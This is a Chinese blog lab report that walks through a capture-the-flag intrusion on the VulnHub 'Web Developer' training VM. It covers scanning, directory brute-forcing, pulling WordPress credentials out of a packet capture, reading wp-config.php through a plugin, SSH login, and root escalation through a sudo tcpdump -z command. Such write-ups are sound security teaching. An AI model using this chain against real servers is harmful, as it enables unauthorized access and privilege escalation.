实验四 CTF实战

最新推荐文章于 2024-05-24 15:56:09 发布
最新推荐文章于 2024-05-24 15:56:09 发布
阅读量200 收藏
点赞数
文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61793472/article/details/127919657
版权
  1. 实验目的和要求

目的:获取靶机Web Developer 文件/root/flag.txt中flag。

基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。

     2.实验步骤

  1. 发现目标 (netdiscover),找到WebDeveloper的IP地址。截图。

打开kali输入指令sudo netdiscover -i eth0 -r 192.168.211.128

扫描得WebDeveloper的IP地址

为192.168.211.133

由于kaili为NAT模式,所以利用netdicover并不会扫到物理机

       2.利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说明目标提供的服务有哪些?(利用第一次实验知识点)

输入指令nmap -sV 192.168.211.133

 

目标提供的服务有:22端口:开启远程登

服务;80端口:开启http服务

        3、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。截图。是否有可用信息?

可以看出该网站是使用wordpress搭建的,可以查找利用该模板搭建的网站具有的漏洞。

 

        4.利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么?

输入命令whatweb 192.168.211.133

可以看出网站使用的CMS模板为Wordpress[4.9.8]

 

       5.网络搜索wpscan,简要说明其功能。

WPScan: WPScan是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题。

功能:WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。

       6.使用 Dirb 爆破网站目录。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。找到一个似乎和网络流量有关的目录(路径)。

输入命令:dirb http://192.168.211.133

与网络流量有关的目录为DIRECTORY: http://192.168.211.133/ipdata/

7.浏览器访问该目录(路径),发现一个cap文件。截图。

 

       8.利用Wireshark分析该数据包,分析TCP数据流。找到什么有用的信息?截图。

打开cap文件,使用筛选器,输入:http.request.method == POST

得到账号:Form item: "log" = "webdeveloper"

密码:Form item: "pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"

        9.利用上一步得到的信息进入网站后台。截图。

(网站管理员账号与操作系统账号是不同概念)

 

成功登录后台: 

     10.利用该CMS存在的(插件Plugin)漏洞。

     11.利用该插件漏洞提权。

下载插件File manager 

 

激活后,打开wp-config.php 

打开后可以查看访问数据库和远程连接服务器的账号和密码

账号webdeveloper;密码MasterOfTheUniverse

 

       12、SSH登录服务器

尝试利用上一步获得的访问数据库的用户名和密码连接远程服务器。截图。

命令: ssh webdeveloper@192.168.211.133 

 

1、尝试查看/root/flag.txt

命令:cat /root/flag.txt
命令:whoami
命令:s -l /root/flag.txt

 

均无法查看。

     12、使用tcpdump执行任意命令(当tcpdump捕获到数据包后会执行指定的命令。)

查看当前身份可执行的命令。

命令:sudo -l, 然后输入password

发现可以root权限执行tcpdump命令

命令:touch /tmp/exploit

(用于创建攻击文件)

命令:echo “cat /root/flag.txt” > /tmp/exploit

(写入shellcode)

命令:chmod +x /tmp/exploit

(赋予可执行权限)

命令:sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

(利用tcpdump执行任意命令)

获得flag

 

 

如意如意按我心意,快快显灵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTF实战实践
weixin_46660023的博客
12-05 5257
文章目录前言一、什么是CTF1. CTF竞赛模式2. CTF各大题型简介二、CTF实战1.nmap扫描2. whatweb探测3. Dirb爆破4. wireshark分析5. 利用漏洞提权6. SSH登录服务器总结 前言 今天做了一个CTF的实践,对目标靶机进行了渗透,以此了解CTF实战过程。 一、什么是CTF         首先先来介绍一下CTF。         CTF(Capt.
CTF实践
m0_62392732的博客
12-19 3556
1.实验目的 实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:Vulnerable By Design ~ VulnHub 实验工具:不限 2.实验步骤和内容: 目的:获取靶机Web Developer
CTF实战
qq_51627527的博客
12-09 774
CTF实 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录CTF实前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结获取靶机Web Developer文件/root/flag.txt中的flag:1. 发现目标,找到WebDeveloper的ip地址。 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可
CTF实战分享 | RWZIP
最新发布
2401_84466225的博客
05-24 823
首先我们要了解,压缩包本身并不具备隐藏信息的功能,但由于在CTF竞赛中,经常出现压缩包与隐写术结合在一起的题目,所以我们需要掌握在CTF竞赛中有关 ZIP 压缩包题目的常见题型及分析手段。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
CTF实战(隐写术):欢迎来到地狱
weixin_30859423的博客
02-28 431
前言:请登录实验吧开启刷题模式,拿到的flag返回该网站验证正确性。 下载“欢迎来到地狱”CTF题目(总共三个文件
CTF 实战选择题
02-28
CTF 实战 选择题,带答案 编辑版
网络渗透测试实验4:CTF实践
zzzfff__的博客
11-18 269
目的:获取靶机Web Developer 文件/root/flag.txt中flag。 基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。
玄魂培训第一期ctf实战
f1gure的博客
04-29 1718
IP:10.9.0.201 先上nmap:PORT  STATE SERVICE22/tcp  open   ssh3306/tcp  open mysql7777/tcp  open cbt8888/tcp  open sun-answerbookMAC Address: 00:FF:18:CA:FB:2E (Unknown)Device type: bridge|general purpose...
中国红客技术,需要传承!红客技术/网络安全零基础入门教学
m0_71745484的博客
06-18 1150
红客技术教学
CTF比赛编码工具Captfencoder-1.3.0
09-21
CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、特殊编码等工具,并聚合各类在线工具。Ascii Encoding Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) Url Encoding Html Entity Encoding Escape Encoding Quoted-printable(可打印字符引用编码) Morse Code(莫尔斯电码) Tap Code(敲击码)
CTF之路关于.cap文件的解密
底层社会中的弱智
02-28 5653
题目 题目:A记录 他在看什么视频,好像很好看,不知道是什么网站的。 还好我截取了他的数据包,找呀找。 答案:CTF{网站} 提示:A记录的第一条。 首先在kali虚拟机中直接打开 明显被加密了 使用kali自带的aircrack-ng工具进行字典破解 aircrack-ng shipin.cap -w wordlist.txt 破解出ESSID为0719 KEY值为8...
实验CTF实践
Dance_in_night的博客
11-28 518
CTF实践
攻防世界web新手区题解(详细)
weixin_46342913的博客
08-21 6742
9.simple_php 题目描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 Knowledge PHP中, ==是不严格的比较,会先进行类型转换再比较, ===是全等,要求类型相同且值相等 解题思路: 阅读代码发现要满足a==0且if a为真,b不是数字且b>1234才会返回flag, 由题可知,我们只需构造一个a类型转化后为0且为真,b不是数字且类型转换后大于1234,用get方式提交,即可得flag。 这里构造a=0ss,b=2267s。 如图: Cyberpeac
[网络安全自学篇] .实验CTF实战之WEB渗透和隐写术解密
Azreal的博客
07-02 1802
本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官! 一.WEB之这是什么 题目地址: http://www.shiyanbar.com/ctf/56 解题链接: http://ctf5.shiyanbar.com/DUTCTF/1.html 题目描述: 打开链接如下图所示,确实是什么鬼东西。
网络安全】CTF/AWD实战速胜指南,《AWD特训营》
喜欢Python编程的程序员柚柚呀
02-19 930
【文末送书】今天推荐一本网安领域优质书籍《AWD特训营》,本文将从其内容与优势出发,详细阐发其对于网安从业人员的重要性与益处。
网络安全自学笔记:实验CTF实战-WEB渗透与隐写术解析
实验CTF实战之WEB渗透和隐写术解密1"这个主题涵盖了两个关键知识点:WEB渗透和隐写术。WEB渗透是指通过发现和利用网站应用程序的安全漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像或其他媒体中隐藏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

如意如意按我心意,快快显灵

您的鼓励是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值